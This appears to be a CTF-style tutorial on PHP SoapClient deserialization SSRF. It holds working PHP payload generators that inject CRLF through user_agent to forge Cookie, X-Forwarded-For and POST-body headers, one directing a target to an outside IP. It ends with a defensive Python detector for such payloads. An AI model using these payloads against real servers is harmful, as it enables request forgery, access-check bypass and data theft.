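PHP's built-in SoapClient class can send both GET parameters and POST parameters.
When a method that does not exist is called on a SoapClient object, SoapClient sends a standalone HTTP request. It is an independent, clean HTTP request: the line breaks do not overwrite other data or anything like that, they are just ordinary line breaks constructed inside the request.
Sending a GET request with SoapClient: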
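<?php
$target = 'http://127.0.0.1/flag.php';
$b = new SoapClient(null, array(
    'location'   => $target,
    // The CR/LF inside user_agent ends the User-Agent header,
    // so the Cookie line goes out as a header of its own.
    'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",
    'uri'        => "http://127.0.0.1/"
));
$se = serialize($b);
// Print the URL-encoded serialized object, prefixed with '|'.
echo "|" . urlencode($se);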
Sending a POST request with SoapClient:
<?php
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_string = 'message=iwantflag&url=http://1.116.110.61:5000';
$headers = array(
    'X-Forwarded-For:127.0.0.1',
    'Cookie:admin=1'
);

class fxxk {
    public $par0;
    public $par1;
    public $par2;
    public $par3;
    public $kelasi;

    public function __construct() {
        $this->par0 = 'SoapClient';
        $this->par1 = NULL;
        // '^^' is a placeholder for CRLF; it is swapped for %0d%0a after serializing.
        // 46 is the byte length of the body that follows the blank line ('^^^^').
        $this->par2 = array(
            'location'   => 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php',
            'user_agent' => 'wupco^^Content-Type: application/x-www-form-urlencoded^^'
                . 'X-Forwarded-For: 127.0.0.1^^Cookie: admin=1'
                . '^^Content-Length: ' . '46' . '^^^^'
                . 'message=iwantflag&url=http://1.116.110.61:5000',
            'uri'        => "peri0d"
        );
        $this->par3 = 'unser';
    }
}

$aaa = new fxxk();
$aaa = serialize($aaa);
$aaa = str_replace('^^', '%0d%0a', $aaa);
$aaa = str_replace('&', '%26', $aaa);
echo $aaa;
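
A defender-side check for the two payload shapes above, as an added example that is not part of the original page: a Python scan of one request parameter for a serialized reference to SoapClient and for CR/LF inside a user_agent value. The function names, the bounded repeated URL-decoding, the key-prefix handling and the sample inputs are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# "SoapClient" as an object class (O:/C:) or as a plain string (s:) that a
# gadget class may instantiate, as in the second payload on this page.
SOAP_NAME = re.compile(rb'[OCs]:10:"SoapClient"', re.IGNORECASE)
# Any key ending in user_agent, followed by a length-prefixed string value.
# Assumption: object property names may carry a prefix before "user_agent".
UA_VALUE = re.compile(rb's:\d+:"[^"]*user_agent";s:(\d+):"')


def decode_layers(raw, max_rounds=3):
    """URL-decode up to max_rounds times so double-encoded %250d%250a is seen."""
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def inspect_param(raw):
    """Return a list of findings for one raw (still URL-encoded) parameter value."""
    data = decode_layers(raw)
    findings = []
    if SOAP_NAME.search(data):
        findings.append("soapclient-reference")
    for match in UA_VALUE.finditer(data):
        # Read exactly the declared number of bytes of the string value.
        start = match.end()
        value = data[start:start + int(match.group(1))]
        if b"\r" in value or b"\n" in value:
            findings.append("crlf-in-user_agent")
            break
    return findings


# Constructed sample inputs (not captured traffic).
SAMPLES = {
    "object": b'O:10:"SoapClient":1:{s:11:"_user_agent";s:17:"ua%0d%0aCookie: a=1%0d%0a";}',
    "gadget-double-encoded": b'a:2:{i:0;s:10:"SoapClient";i:1;a:1:{s:10:"user_agent";s:3:"x%250d%250a";}}',
    "benign": b'a:1:{s:10:"user_agent";s:7:"Mozilla";}',
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_param(raw))
```

A scan like this complements, and does not replace, restricting what the application deserializes, for example with the `allowed_classes` option of PHP's `unserialize()`.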